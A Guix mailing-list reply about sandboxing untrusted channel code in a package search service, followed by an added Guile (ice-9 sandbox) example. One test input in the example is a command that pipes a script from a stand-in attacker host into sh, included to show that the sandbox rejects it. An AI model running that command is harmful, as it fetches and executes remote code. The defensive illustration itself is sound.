
Re: A package search engine for a curated list of channels

From: Ricardo Wurmus
Subject: Re: A package search engine for a curated list of channels
Date: Thu, 05 May 2022 11:01:37 +0200
User-agent: mu4e 1.6.10; emacs 28.0.50

Mekeor Melire <> writes:

> An alternative would be to implement some kind of isolation. But
> channels and package declarations are just scheme/guile code, so they
> will probably always be able to run arbitrary commands on the server.

Guile has some sandboxing features.  It would be an option to evaluate
channel modules in a restricted environment with (ice-9 sandbox).  That
would benefit all of Guix.

> Another approach would be isolation. For each channel, we could run
> hpcguix-web inside a Docker-container so that there's some isolation.
> Then, we'd need to run another web-service which "bundles" the
> packages.json files of all single-channel, dockerized hpcguix-web
> instances. But:
>     (1.) Does Docker really offer sufficient isolation?

No more than “guix shell -C”.  There’s no good reason to use Docker when
you already have Guix.  The Docker service exists for when you have a
Docker container image that you must use, not because its
containerization is superior to “guix shell -C”.
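To make the (ice-9 sandbox) suggestion concrete, here is an added example (not code from this thread, from hpcguix-web or from Guix itself) that evaluates constructed, channel-style S-expressions under Guile's `eval-in-sandbox` with only the pure bindings visible. The sample expressions, the procedure name `eval-channel-expr` and the time and allocation limits are assumptions chosen for illustration.

```scheme
;; Added example: restricted evaluation of untrusted Scheme with (ice-9 sandbox).
;; Not from the original message or from the Guix/hpcguix-web code base.
(use-modules (ice-9 sandbox)
             (ice-9 match))

;; Constructed sample inputs standing in for S-expressions read from a
;; third-party channel.  Only the first is the kind of thing a package
;; indexer should ever have to evaluate.
(define benign-expr
  '(list (cons 'name "hello")
         (cons 'version (string-append "2." (number->string (+ 10 2))))))

(define hostile-expr
  '(system "curl https://attacker.example/x | sh"))

;; `all-pure-bindings' exposes arithmetic, strings, lists, vectors and the
;; like, but nothing that touches the outside world: no `system', no
;; `open-file', no `primitive-load', no (ice-9 popen).  A hostile expression
;; that names one of those simply fails to resolve inside the sandbox module.
;; The time and allocation limits bound CPU use and heap growth, and
;; #:sever-module? detaches the fresh module afterwards so nothing defined
;; during evaluation survives.
(define (eval-channel-expr expr)
  (catch #t
    (lambda ()
      (list 'ok
            (eval-in-sandbox expr
                             #:time-limit 0.5                    ; seconds
                             #:allocation-limit (* 10 1024 1024) ; bytes
                             #:bindings all-pure-bindings
                             #:module (make-sandbox-module all-pure-bindings)
                             #:sever-module? #t)))
    (lambda (key . args)
      ;; Unbound variables, exceeded limits and any other error all land
      ;; here; the caller decides whether to log or drop the entry.
      (list 'rejected key args))))

(define (main)
  (for-each (lambda (expr)
              (match (eval-channel-expr expr)
                (('ok value)
                 (format #t "accepted: ~s~%" value))
                (('rejected key args)
                 (format #t "rejected (~a): ~s~%" key args))))
            (list benign-expr hostile-expr)))

(main)
```

Run it with `guile -s sandbox-example.scm` (file name assumed). Two caveats a practitioner would want: real channel modules begin with `define-module`/`use-modules`, which are not among the pure bindings, so indexing actual channel files this way requires deciding which additional bindings to expose rather than dropping them in unchanged; and the sandbox restricts what the evaluated code can name, but evaluation still happens in the indexer's own process, so it complements rather than replaces running the service itself under an unprivileged user or in a `guix shell -C` container.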

